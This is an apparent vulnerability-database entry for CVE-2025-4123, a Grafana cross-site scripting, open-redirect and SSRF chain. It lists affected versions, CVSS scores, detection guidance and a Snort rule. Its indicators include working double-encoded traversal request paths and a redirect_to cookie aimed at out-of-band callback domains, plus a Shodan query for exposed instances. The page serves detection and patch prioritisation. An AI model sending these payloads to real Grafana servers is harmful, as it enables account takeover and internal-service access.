cbcvebase.
CVE-2025-4123
published 2025-05-22

CVE-2025-4123: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect…

PriorityP278medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
97.81%
99.9th percentile
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.

Affected

22 ranges
VendorProductVersion rangeFixed in
github.comgrafana_grafana>= 0 < 0.0.0-20250521183405-c7a690348df70.0.0-20250521183405-c7a690348df7
grafanagrafana< 10.4.1810.4.18
grafanagrafana
grafanagrafana
grafanagrafana
grafanagrafana
grafanagrafana
grafanagrafana
grafanagrafana
grafanagrafana>= 10.4.18+security-01 < 10.4.1910.4.19
grafanagrafana>= 11.2.0 < 11.2.911.2.9
grafanagrafana>= 11.2.9+security-01 < 11.2.1011.2.10
grafanagrafana>= 11.3.0 < 11.3.611.3.6
grafanagrafana>= 11.3.6+security-01 < 11.3.711.3.7
grafanagrafana>= 11.4.0 < 11.4.411.4.4
grafanagrafana>= 11.4.4+security-01 < 11.4.511.4.5
grafanagrafana>= 11.5.0 < 11.5.411.5.4
grafanagrafana>= 11.5.4+security-01 < 11.5.511.5.5
grafanagrafana>= 11.6.0 < 11.6.111.6.1
grafanagrafana>= 11.6.1+security-01 < 11.6.211.6.2
grafanagrafana>= 12.0.0+security-01 < 12.0.112.0.1
msrccbl2_podman_on_cbl_mariner_2.0

Detection & IOCsextracted from sources · hover to see the quote

urlGET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
path/render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f..
path/public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F..
cookieredirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
path/public/..%2F%5coast.pro%2F%3f%2F..%2F..
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1;)
  • Detect double-URL-encoded path traversal sequences targeting /public/ or /render/public/ endpoints; look for %252f, %255C, %2F%5C patterns in HTTP URI indicating client-side path traversal chained with open redirect.
  • Monitor for HTTP 302 redirect responses from Grafana where the Location header contains backslash-prefixed external hostnames (e.g., /\<external-host>/?/) — a hallmark of successful open redirect exploitation.
  • Alert on the redirect_to cookie containing double-encoded path traversal and external OAST/DNS callback domains, indicating active exploitation or probing.
  • For SSRF detection, correlate Grafana server outbound DNS/HTTP requests to unexpected external hosts with inbound requests to /render/public/ containing path traversal sequences; SSRF is confirmed when content-type image/png is returned alongside an interactsh/DNS callback hit.
  • Use Shodan query `product:"Grafana"` or FOFA query `app="Grafana"` to identify exposed instances for asset inventory and patch prioritization.
  • The M2 Snort rule targets the /a/<plugin>/explore URL pattern combined with path traversal in the raw URI — monitor GET requests to /a/ endpoints that include /explore HTTP/ and backslash-encoded traversal sequences.
  • ·The default Grafana Content-Security-Policy (CSP) blocks XSS via the connect-src directive, but does NOT fully prevent exploitation — client-side enforcement limitations mean the open redirect and SSRF chains remain exploitable.
  • ·If anonymous access is enabled in Grafana, the XSS attack requires NO authentication whatsoever, significantly expanding the attack surface.
  • ·If the Grafana Image Renderer plugin is installed, the open redirect can be escalated to a full-read SSRF, enabling access to internal services and cloud metadata endpoints.
  • ·The plugin feature (required for XSS exploitation) is enabled by default in Grafana, meaning most unpatched instances are exploitable without any configuration changes.
  • ·Exploitation requires user interaction (victim must click a crafted link) and an active user session at the time of the click — purely passive exploitation is not possible.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv6.1MEDIUM
vulncheck7.6HIGH
vendor_redhat7.6HIGH
vendor_msrc3.3LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.